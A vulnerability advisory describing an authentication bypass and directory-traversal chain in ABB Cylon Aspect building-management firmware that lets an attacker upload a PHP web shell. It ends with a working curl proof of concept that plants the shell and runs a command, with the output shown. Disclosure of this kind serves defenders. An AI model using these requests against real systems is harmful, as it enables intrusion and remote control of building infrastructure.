ABB Cylon Aspect 3.08.03 (MIX->DeplomentServlet) Remote Code Execution

Title: ABB Cylon Aspect 3.08.03 (MIX->DeplomentServlet) Remote Code Execution Advisory ID: ZSL-2025-5941 Type: Local/Remote Impact: Security Bypass,…

ABB Cylon Aspect 3.08.03 (MIX->DeplomentServlet) Remote Code Execution

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeplomentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2025-5941
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5941.php

21.04.2024

—

$ cat project

P R O J E C T

.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ curl “http://192.168.73.31:7226/servlets/DeploymentServlet?RequestType=DeployRuntimeJars&filename=../../../home/MIX_CMIX/htmlroot/t.php” \
> –data-binary “” \
> -H “Host: 127.0.0.1” \
> -H “Content-Type: application/octet-stream”

200 Successful

$ curl “http://192.168.73.31:7226/servlets/DeploymentServlet?RequestType=DeployJars&filename=../../../home/MIX_CMIX/htmlroot/t.php” \
> –data-binary “” \
> -H “Host: localhost” \
> -H “Content-Type: application/octet-stream”
200 Successful

$ curl http://192.168.73.31/t.php?cmd=id
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0